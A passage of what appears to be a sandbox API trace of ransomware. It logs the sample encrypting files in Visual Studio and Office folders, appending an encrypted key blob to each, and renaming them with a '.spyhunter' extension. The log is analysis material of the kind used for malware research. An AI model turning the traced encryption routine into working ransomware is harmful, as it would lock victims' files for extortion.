(lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\codefile.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\codefile.zip.spyhunter")) returned 1 [0165.784] GetProcessHeap () returned 0x2c0000 [0165.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.784] GetProcessHeap () returned 0x2c0000 [0165.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0165.784] GetProcessHeap () returned 0x2c0000 [0165.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee7600 | out: hHeap=0x2c0000) returned 1 [0165.784] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce610 | out: pbBuffer=0x25ce610) returned 1 [0165.784] GetProcessHeap () returned 0x2c0000 [0165.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0165.784] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce608*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce608*=0x30) returned 1 [0165.784] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\class.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0165.785] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip") returned 105 [0165.785] StrStrW (lpFirst="Class.zip", lpSrch=".txt") returned 0x0 [0165.785] GetProcessHeap () returned 0x2c0000 [0165.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.785] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce5cc*=0x2bd, lpOverlapped=0x0) returned 1 [0165.786] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffd43, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.786] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x25ce5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce5cc*=0x2bd, lpOverlapped=0x0) returned 1 [0165.786] GetProcessHeap () returned 0x2c0000 [0165.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.787] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.787] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce60c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5cc, lpOverlapped=0x0 | out: lpBuffer=0x25ce60c*, lpNumberOfBytesWritten=0x25ce5cc*=0x4, lpOverlapped=0x0) returned 1 [0165.787] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5cc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5cc*=0x30, lpOverlapped=0x0) returned 1 [0165.788] CloseHandle (hObject=0xa0) returned 1 [0165.788] GetProcessHeap () returned 0x2c0000 [0165.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.788] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip.spyhunter") returned 115 [0165.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\class.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\class.zip.spyhunter")) returned 1 [0165.789] GetProcessHeap () returned 0x2c0000 [0165.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.789] GetProcessHeap () returned 0x2c0000 [0165.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0165.789] GetProcessHeap () returned 0x2c0000 [0165.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee74d8 | out: hHeap=0x2c0000) returned 1 [0165.789] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce610 | out: pbBuffer=0x25ce610) returned 1 [0165.789] GetProcessHeap () returned 0x2c0000 [0165.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0165.789] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce608*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce608*=0x30) returned 1 [0165.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0165.790] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip") returned 120 [0165.790] StrStrW (lpFirst="AssemblyInfoInternal.zip", lpSrch=".txt") returned 0x0 [0165.790] GetProcessHeap () returned 0x2c0000 [0165.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.790] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce5cc*=0x4e2, lpOverlapped=0x0) returned 1 [0165.791] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffb1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.791] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4e2, lpNumberOfBytesWritten=0x25ce5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce5cc*=0x4e2, lpOverlapped=0x0) returned 1 [0165.792] GetProcessHeap () returned 0x2c0000 [0165.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.792] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.792] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce60c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5cc, lpOverlapped=0x0 | out: lpBuffer=0x25ce60c*, lpNumberOfBytesWritten=0x25ce5cc*=0x4, lpOverlapped=0x0) returned 1 [0165.792] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5cc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5cc*=0x30, lpOverlapped=0x0) returned 1 [0165.792] CloseHandle (hObject=0xa0) returned 1 [0165.792] GetProcessHeap () returned 0x2c0000 [0165.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.792] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.spyhunter") returned 130 [0165.792] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip.spyhunter")) returned 1 [0165.793] GetProcessHeap () returned 0x2c0000 [0165.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.793] GetProcessHeap () returned 0x2c0000 [0165.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0165.793] GetProcessHeap () returned 0x2c0000 [0165.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3b1b0 | out: hHeap=0x2c0000) returned 1 [0165.794] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce608 | out: pbBuffer=0x25ce608) returned 1 [0165.794] GetProcessHeap () returned 0x2c0000 [0165.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0165.794] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce600*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce600*=0x30) returned 1 [0165.794] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0165.795] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip") returned 112 [0165.795] StrStrW (lpFirst="AssemblyInfo.zip", lpSrch=".txt") returned 0x0 [0165.795] GetProcessHeap () returned 0x2c0000 [0165.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.795] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce5c4*=0x492, lpOverlapped=0x0) returned 1 [0165.805] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffb6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.805] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x492, lpNumberOfBytesWritten=0x25ce5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce5c4*=0x492, lpOverlapped=0x0) returned 1 [0165.805] GetProcessHeap () returned 0x2c0000 [0165.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.805] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.806] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce604*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5c4, lpOverlapped=0x0 | out: lpBuffer=0x25ce604*, lpNumberOfBytesWritten=0x25ce5c4*=0x4, lpOverlapped=0x0) returned 1 [0165.806] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5c4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5c4*=0x30, lpOverlapped=0x0) returned 1 [0165.806] CloseHandle (hObject=0xa0) returned 1 [0165.806] GetProcessHeap () returned 0x2c0000 [0165.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.806] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.spyhunter") returned 122 [0165.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip.spyhunter")) returned 1 [0165.807] GetProcessHeap () returned 0x2c0000 [0165.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.807] GetProcessHeap () returned 0x2c0000 [0165.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0165.807] GetProcessHeap () returned 0x2c0000 [0165.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e877d8 | out: hHeap=0x2c0000) returned 1 [0165.807] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce608 | out: pbBuffer=0x25ce608) returned 1 [0165.807] GetProcessHeap () returned 0x2c0000 [0165.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0165.807] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce600*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce600*=0x30) returned 1 [0165.807] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\aboutbox.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0165.808] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip") returned 108 [0165.808] StrStrW (lpFirst="AboutBox.zip", lpSrch=".txt") returned 0x0 [0165.808] GetProcessHeap () returned 0x2c0000 [0165.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.808] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce5c4*=0x2800, lpOverlapped=0x0) returned 1 [0165.885] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.885] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce5c4*=0x2800, lpOverlapped=0x0) returned 1 [0165.885] GetProcessHeap () returned 0x2c0000 [0165.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.885] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.885] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce604*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5c4, lpOverlapped=0x0 | out: lpBuffer=0x25ce604*, lpNumberOfBytesWritten=0x25ce5c4*=0x4, lpOverlapped=0x0) returned 1 [0165.886] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5c4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5c4*=0x30, lpOverlapped=0x0) returned 1 [0165.886] CloseHandle (hObject=0xa0) returned 1 [0165.886] GetProcessHeap () returned 0x2c0000 [0165.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.886] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip.spyhunter") returned 118 [0165.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\aboutbox.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\aboutbox.zip.spyhunter")) returned 1 [0165.887] GetProcessHeap () returned 0x2c0000 [0165.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.888] GetProcessHeap () returned 0x2c0000 [0165.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0165.888] GetProcessHeap () returned 0x2c0000 [0165.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee7288 | out: hHeap=0x2c0000) returned 1 [0165.888] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce600 | out: pbBuffer=0x25ce600) returned 1 [0165.888] GetProcessHeap () returned 0x2c0000 [0165.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0165.888] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5f8*=0x30) returned 1 [0165.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVS.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0165.889] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVS.DLL") returned 62 [0165.889] StrStrW (lpFirst="UMLVS.DLL", lpSrch=".txt") returned 0x0 [0165.889] GetProcessHeap () returned 0x2c0000 [0165.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.889] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce5bc*=0x2800, lpOverlapped=0x0) returned 1 [0165.897] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.897] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce5bc*=0x2800, lpOverlapped=0x0) returned 1 [0165.897] GetProcessHeap () returned 0x2c0000 [0165.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.898] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.898] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce5fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5bc, lpOverlapped=0x0 | out: lpBuffer=0x25ce5fc*, lpNumberOfBytesWritten=0x25ce5bc*=0x4, lpOverlapped=0x0) returned 1 [0165.921] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5bc*=0x30, lpOverlapped=0x0) returned 1 [0165.921] CloseHandle (hObject=0xa0) returned 1 [0165.924] GetProcessHeap () returned 0x2c0000 [0165.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.924] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVS.DLL.spyhunter") returned 72 [0165.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVS.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvs.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVS.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvs.dll.spyhunter")) returned 1 [0165.925] GetProcessHeap () returned 0x2c0000 [0165.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.925] GetProcessHeap () returned 0x2c0000 [0165.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0165.925] GetProcessHeap () returned 0x2c0000 [0165.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5498 | out: hHeap=0x2c0000) returned 1 [0165.925] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce600 | out: pbBuffer=0x25ce600) returned 1 [0165.925] GetProcessHeap () returned 0x2c0000 [0165.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0165.925] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5f8*=0x30) returned 1 [0165.925] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSUPLD.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\stsupld.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0165.927] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSUPLD.DLL") returned 64 [0165.927] StrStrW (lpFirst="STSUPLD.DLL", lpSrch=".txt") returned 0x0 [0165.927] GetProcessHeap () returned 0x2c0000 [0165.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0165.927] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce5bc*=0x2800, lpOverlapped=0x0) returned 1 [0165.980] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.980] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce5bc*=0x2800, lpOverlapped=0x0) returned 1 [0165.980] GetProcessHeap () returned 0x2c0000 [0165.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0165.980] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.980] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5bc, lpOverlapped=0x0 | out: lpBuffer=0x25ce5fc*, lpNumberOfBytesWritten=0x25ce5bc*=0x4, lpOverlapped=0x0) returned 1 [0165.992] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5bc*=0x30, lpOverlapped=0x0) returned 1 [0165.992] CloseHandle (hObject=0xb0) returned 1 [0165.992] GetProcessHeap () returned 0x2c0000 [0165.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.993] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: 